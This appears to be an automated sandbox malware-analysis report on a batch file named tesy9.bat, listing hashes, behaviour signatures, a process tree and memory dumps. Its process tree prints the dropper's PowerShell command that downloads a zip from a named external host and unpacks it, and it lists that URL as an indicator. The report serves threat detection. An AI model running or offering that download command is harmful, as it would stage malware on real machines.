8992e6efcf8d972b9cddf644aea8c5ea29cb571c729029727eb08aa72c793c1c

Analysis

max time kernel
1615s
max time network
1619s
platform
windows7_x64
resource
win7-20230703-en
resource tags

arch:x64arch:x86image:win7-20230703-enlocale:en-usos:windows7-x64system
submitted
04/07/2023, 14:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

tesy9.bat
Size

700B
MD5

185a2d7bf8c479e47ed8e1ef2cffe6a3
SHA1

810436c92e9eb0c3ef0f6867e938b314f85f43c0
SHA256

e5aaa6de5373b002a54ae2cce47c384f11a80e66b03531b98e8eff1a8dd79581
SHA512

9f1fad5e2a66d6e3d8645ce6c4614fe65ccd169dfa7f78fa3ada228bd543fa7c3dadc384d839d063b66887207897226c57dc62bfb8458ba65614f153791c44bd

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.nest.rip/uploads/126d1e0b-e170-4964-b710-93ec152ec8c9.zip

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
4	2980	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2980	powershell.exe
1980	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2980	powershell.exe
Token: SeDebugPrivilege	1980	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2952 wrote to memory of 2980	2952	cmd.exe	29
PID 2952 wrote to memory of 2980	2952	cmd.exe	29
PID 2952 wrote to memory of 2980	2952	cmd.exe	29
PID 2952 wrote to memory of 1980	2952	cmd.exe	30
PID 2952 wrote to memory of 1980	2952	cmd.exe	30
PID 2952 wrote to memory of 1980	2952	cmd.exe	30

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\tesy9.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2952
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.nest.rip/uploads/126d1e0b-e170-4964-b710-93ec152ec8c9.zip', 'test.zip')"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2980
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "Expand-Archive -Path 'test.zip' -DestinationPath '.'"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1980

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
0d8ed03baedc324f7d2ace050c1e5f27

SHA1
1f84719caac746943af0e068b8a0eec7e012e3c7

SHA256
07ae79ef1037b87dec5f8270f607c38b3ba56cf0b2e5a75a372a8541d687baa4

SHA512
81a9fb541eead967a3811ea5c9fcb591fa7ec7a9acdce2ba21551985d957c10a7dd82c3a4e43eddce4b19bd00c65b6d3d9e825325268362ddca6c6830897d923

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6F2E6KFR92RM1PN2J6SW.temp

Filesize
7KB

MD5
0d8ed03baedc324f7d2ace050c1e5f27

SHA1
1f84719caac746943af0e068b8a0eec7e012e3c7

SHA256
07ae79ef1037b87dec5f8270f607c38b3ba56cf0b2e5a75a372a8541d687baa4

SHA512
81a9fb541eead967a3811ea5c9fcb591fa7ec7a9acdce2ba21551985d957c10a7dd82c3a4e43eddce4b19bd00c65b6d3d9e825325268362ddca6c6830897d923

Download Submit
memory/1980-70-0x000000001B250000-0x000000001B532000-memory.dmp

Filesize
2.9MB

Download
memory/1980-71-0x0000000002370000-0x0000000002378000-memory.dmp

Filesize
32KB

Download
memory/1980-73-0x000000000265B000-0x0000000002692000-memory.dmp

Filesize
220KB

Download
memory/1980-72-0x0000000002654000-0x0000000002657000-memory.dmp

Filesize
12KB

Download
memory/2980-58-0x000000001B390000-0x000000001B672000-memory.dmp

Filesize
2.9MB

Download
memory/2980-59-0x0000000001FD0000-0x0000000001FD8000-memory.dmp

Filesize
32KB

Download
memory/2980-60-0x00000000029D0000-0x0000000002A50000-memory.dmp

Filesize
512KB

Download
memory/2980-61-0x00000000029D0000-0x0000000002A50000-memory.dmp

Filesize
512KB

Download
memory/2980-62-0x00000000029D0000-0x0000000002A50000-memory.dmp

Filesize
512KB

Download
memory/2980-63-0x00000000029D0000-0x0000000002A50000-memory.dmp

Filesize
512KB

Download